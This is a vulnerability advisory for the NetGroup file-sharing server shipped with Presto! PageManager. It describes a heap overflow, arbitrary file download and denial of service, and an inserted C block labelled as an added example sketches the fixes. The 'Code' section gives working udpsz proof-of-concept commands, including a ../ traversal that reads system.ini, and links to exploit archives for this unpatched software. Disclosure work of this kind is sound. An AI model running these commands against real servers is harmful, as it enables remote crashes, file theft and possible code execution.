#######################################################################
Luigi Auriemma
Application: Presto! PageManager
http://www.newsoftinc.com/products/product_page.php?P_Id=5
Versions: <= 9.01
Platforms: Windows, MacOSX
Bugs: A] Heap-overflow
B] Arbitrary file download
C] Denial of Service
Exploitation: remote
Date: 14 Mar 2012
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
Presto! PageManager is scanner management software that some hardware
vendors (like Epson) also ship by default.
It's bundled with a (manual) server program called NetGroup for remote
file transfer:
"The Network Group function helps you exchange files with your group
members. Everyone in the working group should have Presto! PageManager
running."
#######################################################################
=======
2) Bugs
=======
----------------
A] Heap-overflow
----------------
Heap overflow on port 2502 while copying the message string into a
small heap buffer:
004151BE |. 33C0 XOR EAX,EAX
004151C0 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; strlen
004151C2 |. F7D1 NOT ECX
004151C4 |. 2BF9 SUB EDI,ECX
004151C6 |. 6A FF PUSH -1
004151C8 |. 8BC1 MOV EAX,ECX
004151CA |. 8BF7 MOV ESI,EDI
004151CC |. 8BFA MOV EDI,EDX
004151CE |. C1E9 02 SHR ECX,2 ; heap overflow
004151D1 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
004151D3 |. 8BC8 MOV ECX,EAX
004151D5 |. 83E1 03 AND ECX,3
004151D8 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
004151DA |. 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
004151DE |. E8 1B370000 CALL <JMP.&MFC42.#5572>
004151E3 |. 8B5424 10 MOV EDX,DWORD PTR SS:[ESP+10]
004151E7 |. 8D4C24 2C LEA ECX,DWORD PTR SS:[ESP+2C]
004151EB |. 51 PUSH ECX
004151EC |. 52 PUSH EDX
004151ED |. E8 56350000 CALL <JMP.&PMCommon._GetFileExtName>
004151F2 |. BE 94014200 MOV ESI,NetGroup.00420194 ; ASCII ".NSOFT"
--------------------------
B] Arbitrary file download
--------------------------
The software allows a client to download any file from the server.
--------------------
C] Denial of Service
--------------------
The server simply terminates itself when it cannot allocate the amount
of memory specified by the client.
There is also a division by zero when a file size of 0 bytes is
specified.
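The three server-side checks that bugs A, B and C call for, as an added
example that is not part of this advisory or of NetGroup's code; the
buffer size, the allocation cap and the request fields are assumptions,
since the real wire format is not documented here.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Assumed values: NetGroup's real buffer size and request layout are not given here. */
#define MSG_BUF_SIZE 64          /* the "small heap buffer" of bug A */
#define MAX_ALLOC    (16u << 20) /* upper bound on a client-requested allocation */

enum req_status { REQ_OK = 0, REQ_MSG_TOO_LONG, REQ_ALLOC_TOO_BIG, REQ_ZERO_SIZE, REQ_NO_MEMORY };

/* Bug A: the disassembly does strlen() and then REP MOVS into the heap
 * buffer with no comparison against the buffer's size. The safe version
 * compares first and refuses the message instead of overflowing. */
static int receive_message(const char *msg)
{
    char *buf = malloc(MSG_BUF_SIZE);
    if (buf == NULL) return REQ_NO_MEMORY;
    size_t len = strlen(msg);
    if (len + 1 > MSG_BUF_SIZE) { free(buf); return REQ_MSG_TOO_LONG; }
    memcpy(buf, msg, len + 1);
    free(buf);                   /* a real server would keep and use buf */
    return REQ_OK;
}

/* Bug B: a file request must stay inside the shared directory, so reject
 * empty and absolute paths, drive letters and any ".." component
 * (checked against both '/' and '\\' separators). */
static int path_is_confined(const char *p)
{
    if (p[0] == '\0' || p[0] == '/' || p[0] == '\\') return 0;
    if (isalpha((unsigned char)p[0]) && p[1] == ':') return 0;
    while (*p) {
        size_t n = strcspn(p, "/\\");
        if (n == 2 && p[0] == '.' && p[1] == '.') return 0;
        p += n;
        if (*p) p++;
    }
    return 1;
}

/* Bug C: cap the allocation the client asks for instead of letting a failed
 * allocation terminate the process, and refuse a 0-byte file size before
 * any later arithmetic divides by it. */
static int check_transfer(uint32_t alloc_size, uint32_t file_size)
{
    if (alloc_size > MAX_ALLOC) return REQ_ALLOC_TOO_BIG;
    if (file_size == 0) return REQ_ZERO_SIZE;
    return REQ_OK;
}
```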
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip
A]
udpsz -T -C "00000100 ffff0200" 0 -b a -C "00 00 1000000000000000 00" -1 SERVER 2502 8+0x02ffff
just a quick test, there are better ways to show code execution
B]
udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00c:\\windows\\system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8
or
udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00../../../../windows/system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8
C]
udpsz -T -C "00010000 ffffffff" SERVER 2501 -1
or
udpsz -T -C "00000100 ffffffff" SERVER 2502 -1
#######################################################################
======
4) Fix
======
No fix.
#######################################################################